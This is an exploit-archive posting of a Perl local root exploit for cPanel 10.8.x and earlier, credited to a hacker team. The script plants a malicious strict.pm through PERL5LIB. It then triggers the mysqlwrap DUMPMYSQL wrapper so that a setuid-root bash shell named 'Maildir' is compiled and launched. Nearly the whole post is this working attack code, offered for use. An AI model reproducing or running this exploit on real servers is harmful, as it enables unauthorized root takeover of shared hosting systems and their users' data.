ExploitFixes
[D] cPanel <= 10.8.x cpwrap root exploit via mysqladmin [z] 2010-12-23 12:40:29
Posted by: kedans

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] cPanel &lt;= 10.8.x cpwrap root exploit via mysqladmin [z]

# Author : KedAns-Dz &lt; Ked-H (at) Hotmail (dot) com

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#!/usr/bin/perl -w

#- cPanel &lt;= 10.8.x cpwrap root exploit via mysqladmin
# By KedAns
# [D] HaCkErS-StreeT-Team[Z]

my $cpwrap = &quot;/usr/local/cpanel/bin/cpwrap&quot;;
my $mysqlwrap = &quot;/usr/local/cpanel/bin/mysqlwrap&quot;;
my $pwd = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = &quot;$pwd&quot;;

if ( ! -x &quot;/usr/bin/gcc&quot; ) { die &quot;gcc: $!\n&quot;; }
if ( ! -x &quot;$cpwrap&quot; ) { die &quot;$cpwrap: $!\n&quot;; }
if ( ! -x &quot;$mysqlwrap&quot; ) { die &quot;$mysqlwrap: $!\n&quot;; }

open (CPWRAP, &quot;&lt;$cpwrap&quot;) or die &quot;Could not open $cpwrap: $!\n&quot;;
while(&lt;CPWRAP&gt;) {
if(/REMOTE_USER/) { die &quot;$cpwrap is patched.\n&quot;; }
}
close (CPWRAP);

open (STRICT, &quot;&gt;strict.pm&quot;) or die &quot;Can't open strict.pm: $!\n&quot;;
print STRICT &quot;\$e = \&quot;int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\&quot;/bin/bash\\\\\\\&quot;);}\&quot;;\n&quot;;
print STRICT &quot;system(\&quot;/bin/echo -n \\\&quot;\$e\\\&quot;&gt;Maildir.c\&quot;);\n&quot;;
print STRICT &quot;system(\&quot;/usr/bin/gcc Maildir.c -o Maildir\&quot;);\n&quot;;
print STRICT &quot;system(\&quot;/bin/chmod 4755 Maildir\&quot;);\n&quot;;
print STRICT &quot;system(\&quot;/bin/rm -f Maildir.c strict.pm\&quot;);\n&quot;;
close (STRICT);

system(&quot;$mysqlwrap DUMPMYSQL 2&gt;/dev/null&quot;);

if ( -e &quot;Maildir&quot; ) {
system(&quot;./Maildir&quot;);
}
else {
unlink &quot;strict.pm&quot;;
die &quot;Failed\n&quot;;
}
# By KedAns-Dz

:::::::::::::::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z]

-- [&gt;&gt;] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[&lt;&lt;] --
-- [&gt;] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [&lt;] --